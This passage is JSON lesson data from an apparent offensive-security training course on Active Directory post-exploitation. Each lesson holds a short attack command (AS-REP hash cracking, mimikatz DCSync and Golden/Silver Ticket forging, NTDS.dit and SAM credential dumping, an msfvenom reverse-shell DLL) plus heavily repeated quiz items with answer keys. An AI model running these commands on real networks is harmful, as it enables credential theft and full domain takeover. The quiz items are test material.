anyone.","sections":[{"type":"text","content":"Disabled Kerberos pre-authentication lets anyone request an AS-REP encrypted with the user's hash."},{"type":"code","lang":"bash","content":"GetNPUsers.py domain/ -usersfile users.txt -dc-ip 10.10.10.5 -format hashcat\nhashcat -m 18200 asrep.hash rockyou.txt"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"What setting enables AS-REP roasting?","opts":["Password never expires","No Kerberos pre-auth","Account disabled","Must change password"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"golden-ticket","cat":"Post-Exploitation","title":"Golden Ticket Attack","diff":3,"xp":300,"intro":"KRBTGT hash = forge any Kerberos ticket. Total domain compromise.","sections":[{"type":"text","content":"A forged TGT signed with KRBTGT hash. Persists until KRBTGT is changed TWICE."},{"type":"code","lang":"powershell","content":"lsadump::dcsync /user:domainkrbtgt\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"How long does a Golden Ticket persist?","opts":["24 hours","Until KRBTGT changed twice","7 days","Until logout"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"silver-ticket","cat":"Post-Exploitation","title":"Silver Ticket Attack","diff":3,"xp":250,"intro":"Forge a TGS for a specific service without touching the DC.","sections":[{"type":"text","content":"Stealthier than Golden \u2014 targets one service, doesn't contact the KDC."},{"type":"code","lang":"powershell","content":"kerberos::golden /user:admin /domain:corp.local /sid:S-1-5-21-... /target:server01 /service:cifs /rc4:<hash> /ptt"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Silver vs Golden Ticket?","opts":["Silver is for a specific service","Silver requires domain admin","Golden is stealthier","They're the same"],"ans":0},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"dcsync-attack","cat":"Post-Exploitation","title":"DCSync Attack","diff":3,"xp":250,"intro":"Impersonate a DC and request password replication.","sections":[{"type":"text","content":"Uses MS-DRSR to request password data as if performing DC replication."},{"type":"code","lang":"bash","content":"secretsdump.py domain/admin:pass@10.10.10.5"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"DCSync abuses which protocol?","opts":["LDAP","MS-DRSR","SMB","Kerberos"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"ntds-dit-extraction","cat":"Post-Exploitation","title":"NTDS.dit Extraction","diff":3,"xp":200,"intro":"The AD database with every hash.","sections":[{"type":"text","content":"NTDS.dit stored on DCs contains all user hashes. Extract via shadow copy."},{"type":"code","lang":"cmd","content":"vssadmin create shadow /for=C:\ncopy \\?...NTDS\\ntds.dit C:\\temp\\\nsecretsdump.py -ntds ntds.dit -system SYSTEM LOCAL"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"What additional file decrypts NTDS.dit?","opts":["SAM","SYSTEM hive","SECURITY","SOFTWARE"],"ans":1},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"sam-dump","cat":"Post-Exploitation","title":"SAM Database Dump","diff":1,"xp":75,"intro":"Local Windows password hashes in one file.","sections":[{"type":"text","content":"SAM stores local user hashes. Extract with reg save or mimikatz."},{"type":"code","lang":"cmd","content":"reg save HKLMSAM sam.save\nreg save HKLMSYSTEM system.save\nsecretsdump.py -sam sam.save -system system.save LOCAL"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Where are local Windows hashes?","opts":["NTDS.dit","SAM database","/etc/shadow","LSASS"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"process-injection","cat":"Post-Exploitation","title":"Process Injection","diff":3,"xp":250,"intro":"Inject code into a legitimate process to evade detection.","sections":[{"type":"text","content":"Write shellcode into another process's memory and execute it. Blends with legitimate activity."},{"type":"code","lang":"bash","content":"# CreateRemoteThread: allocate memory, write shellcode, create thread\n# The code runs under the target process's identity"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Why inject into another process?","opts":["Faster","Evades detection by running in legitimate process","Less memory","Required for network"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"dll-injection-postex","cat":"Post-Exploitation","title":"DLL Injection","diff":2,"xp":200,"intro":"Force a process to load your malicious DLL.","sections":[{"type":"text","content":"Allocate memory in target, write DLL path, call LoadLibraryA via CreateRemoteThread."},{"type":"code","lang":"bash","content":"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o evil.dll"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Function used to load a DLL remotely?","opts":["CreateProcess","LoadLibraryA","ReadFile","RegOpenKey"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service 